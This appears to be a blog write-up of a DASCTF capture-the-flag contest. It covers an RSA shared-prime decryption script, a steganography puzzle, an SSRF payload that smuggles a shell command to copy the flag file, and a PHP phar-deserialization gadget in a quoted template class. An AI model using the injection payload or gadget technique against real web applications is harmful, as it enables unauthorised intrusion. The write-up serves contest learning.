Manu Zhu

穷者独善其身


dasctf 12月月赛 wp

asa

两个n共用了同一个质数,对两个n求最大公约数即可得到这个公共质因子p。将n分解后按照顺序解出密钥(key和iv),再做AES解密就可以得到flag

from Crypto.Cipher import AES
from Crypto.Util.number import bytes_to_long, long_to_bytes

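def ex_gcd(a, b):
    """Run the extended Euclidean algorithm on ``a`` and ``b``.

    Returns a tuple ``(g, x, y)`` where ``g`` is the last non-zero remainder
    of Euclid's algorithm (the gcd for non-negative inputs) and
    ``a * x + b * y == g``.  When ``b`` is 0 the result is ``(a, 1, 0)``.

    Written as a loop rather than a recursion: Euclid's algorithm can take
    well over a thousand division steps on operands of RSA size, which would
    exceed Python's default recursion limit.  The coefficients returned are
    the same ones the recursive back-substitution produces.
    """
    prev_r, cur_r = a, b
    prev_x, cur_x = 1, 0
    prev_y, cur_y = 0, 1
    while cur_r != 0:
        quotient, remainder = divmod(prev_r, cur_r)
        prev_r, cur_r = cur_r, remainder
        # Carry the Bezout coefficients along with the remainders so that
        # prev_r == a * prev_x + b * prev_y holds after every step.
        prev_x, cur_x = cur_x, prev_x - quotient * cur_x
        prev_y, cur_y = cur_y, prev_y - quotient * cur_y
    return prev_r, prev_x, prev_y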

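def rsa_dec(n, p, q, e, c):
    """Decrypt ``c`` with textbook (unpadded) RSA, given the factors of ``n``.

    Args:
        n: RSA modulus, expected to equal ``p * q``.
        p, q: the two prime factors of ``n``.
        e: public exponent.
        c: ciphertext as an integer.

    Returns:
        ``c ** d mod n`` where ``d`` is the inverse of ``e`` modulo
        ``(p - 1) * (q - 1)``.

    Raises:
        ValueError: if ``e`` has no inverse modulo ``(p - 1) * (q - 1)``.
    """
    phi = (p - 1) * (q - 1)
    g, d, _ = ex_gcd(e, phi)
    if g != 1:
        # Without this check a non-invertible e would silently yield garbage.
        raise ValueError("e is not invertible modulo (p - 1) * (q - 1)")
    # The Bezout coefficient can be negative.  Reducing it modulo phi gives the
    # usual private exponent and avoids pow() with a negative exponent, which
    # older Python 3 releases reject and newer ones only accept when c is
    # invertible modulo n.
    return pow(c, d % phi, n)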

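# Public parameters and ciphertexts given by the challenge.
e = 65537
n1 = 0x661d752110bcc6ee5ca33edaf244716cccce6400dfdbfd84ce6ae2d8fbbeb2f61584da7668768403b6135e7810eae9d4d8e044935f8680de5324c3fc0f9bffb01812f9d2ac9055ee8dbd17b90c5a60cb7595a82f24a075d951db3b7f913b8543ecd52b8c8464ce348c3970d511ae911e814f9ca33b8412db2730e61820f5de47
n2 = 0x9f159326c907441326c88d17eae1c6e8aaea23922c5e628a585294e379e9245644f9c249c57f54a2b83921b4adc988fecc90c00feb6936d9be1f3a5ffae951b74ffbc6fc7aa11743e4ca179a937392dacf931e820d1d83016562ff608e8c59ef7310654a09bbba4a0129f71dcb61bd9bef073bbb93bfcac4a7a2e81156dbb32d
c1 = 0xd7931796fa39cfa37c0b621c01175904206dff1d74a28369dcd6517957ed76c5eb7d4934cbeb902119f9215f9ae7926debe3abe856244b45dbb4caaa2b93dbb79a3ca1a9813e1466c49fe3c03e5462811afbf3f40ff79927f9fe3681b7f3cef34466b9a736512f4931b5026eefacbae9be6e408085a7a636c514574c3b22ffe
c2 = 0x6240740d41a539a88634726cf0a791a87e02419c3c3e00dff62eba59e81a93fd04a59109e57f64fc375b9a321583b6fa133317eb5c4e6eb1e6f6d9a0b4ae6ff0c54423718811f7956cd63b7bf9c7f8e29f48dad8f05b63b71d6c5112d91864adba0d6bb342c67aee39ccd5e2a6928a8e4ab2248d29a0c990bae821b31b39b1f3

# Prime shared by n1 and n2.  The page hard-codes it; presumably it came from
# gcd(n1, n2), since the write-up says both moduli reuse one prime.
# Takeaway for key generation: moduli must never share a prime factor, because
# a single gcd then factors every modulus that contains it.
p = 9540203717217880059997385799331301649727503984010337568404427747385824530958536656147747848448822264268428226235860927158082497191830274046098671199542207

# Floor division would hide a mistyped constant, so confirm p really divides
# both moduli before deriving the cofactors.
if n1 % p != 0 or n2 % p != 0:
    raise ValueError("p does not divide both moduli")

q1 = n1 // p
q2 = n2 // p

# The two RSA ciphertexts wrap the AES key and the CBC IV respectively.
key = rsa_dec(n1, p, q1, e, c1)
iv = rsa_dec(n2, p, q2, e, c2)
print(key, iv)

# long_to_bytes() drops leading zero bytes.  Pad back to a valid length: AES
# keys are 16, 24 or 32 bytes (multiples of 8) and the CBC IV is exactly one
# 16-byte block.
key = long_to_bytes(key, 8)
iv = long_to_bytes(iv, 16)
c = 0xf8559d671b720cd336f2d8518ad6eac8c405585158dfde74ced376ba42d9fe984d519dc185030ddec7b4dc240fd90fa8
c = long_to_bytes(c)

# The plaintext is printed as raw bytes; any block padding is left in place.
m = AES.new(key, AES.MODE_CBC, iv).decrypt(c)
print(m)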

马老师

所有二维码扫出来是经典语录,没什么用。binwalk看到压缩包,foremost分解出来,其中棋盘图片是zip伪加密。

img

打开之后用狗眼看出来 `md5(NianQingRenBuJiangWuDe)`,计算得到的字符串就是另外两个文件的解压密码。解压后根据要求还原成 Ook! 密文,放到解密网站上解密即可得到flag

easyjs

做法同网鼎杯总决赛-半决赛easyjs。

payload:{“url”:”http://127.0.0.2:10300/debug?url=http://a%2527@a;cp${IFS}/flag${IFS}/tmp/log%00"}

easyphp

做法同XNUCA2020 Final 个人赛php。

phar反序列化。先用伪协议读取template.php的内容:

<?php

/**
 * Template renderer quoted from the challenge's template.php.
 *
 * render() expands {{name}} placeholders from same-named global variables and
 * writes the result to a file under /var/www/html/uploads/.
 *
 * Review notes:
 * - All three properties are public. The constructor sets safe-looking values
 *   for $pattern and $suffix, but an instance restored by unserialization
 *   skips the constructor, so both must be treated as untrusted there.
 * - __destruct() calls render(), so destroying any instance performs a file
 *   write. Side effects in destructors are what make a class usable as a
 *   deserialization gadget; the write belongs in an explicit method call.
 */
class Template{

// Text to render; may contain {{name}} placeholders.
public $content;
// Regex used to find placeholders; capture group 1 is the variable name.
public $pattern;
// Extension appended to the output file name.
public $suffix;

/**
 * Store the content and set the default placeholder pattern and ".html" suffix.
 */
public function __construct($content){
$this->content = $content;
$this->pattern = "/{{([a-z]+)}}/";
$this->suffix = ".html";
}

/**
 * Render on destruction (this also runs for unserialized instances).
 */
public function __destruct() {
$this->render();
}

/**
 * Expand placeholders, then write the content to the uploads directory and
 * echo the resulting path.
 */
public function render() {
// Loop until no placeholder matches or the named global is not set.
// A value that itself contains a resolvable placeholder keeps the loop going.
while (True) {
if(preg_match($this->pattern, $this->content, $matches)!==1)
break;
// Variable-variable: imports whichever global the placeholder names, so
// content can read any global whose name the pattern accepts.
global ${$matches[1]};
if(isset(${$matches[1]})) {
// Replaces every match of the pattern (not only this name) with this one
// value. The value is passed as a replacement string, so backreference
// sequences inside it are interpreted by preg_replace.
$this->content = preg_replace($this->pattern, ${$matches[1]}, $this->content);
}
else{
break;
}
}
// Length is the only constraint on the suffix; an allow-list of permitted
// extensions would be the safer check.
if(strlen($this->suffix)>5) {
echo "error suffix";
die();
}
// Path: per-client directory md5(REMOTE_ADDR), file name md5(content) + suffix.
// The directory is not created here and must already exist.
$filename = '/var/www/html/uploads/' . md5($_SERVER['REMOTE_ADDR']) . "/" . md5($this->content) . $this->suffix;
// The return value is not checked, so a failed write goes unnoticed.
file_put_contents($filename, $this->content);
// Discloses the absolute server-side path to the client.
echo "Your html file is in " . $filename;
}
}
?>

可能需要修改suffix才能让写入的内容作为php执行;存在文件上传;__destruct魔术方法会调用render(),进而触发file_put_contents的文件操作,这样就可以利用phar反序列化。先在本地起个环境,执行内容,然后再进行phar操作。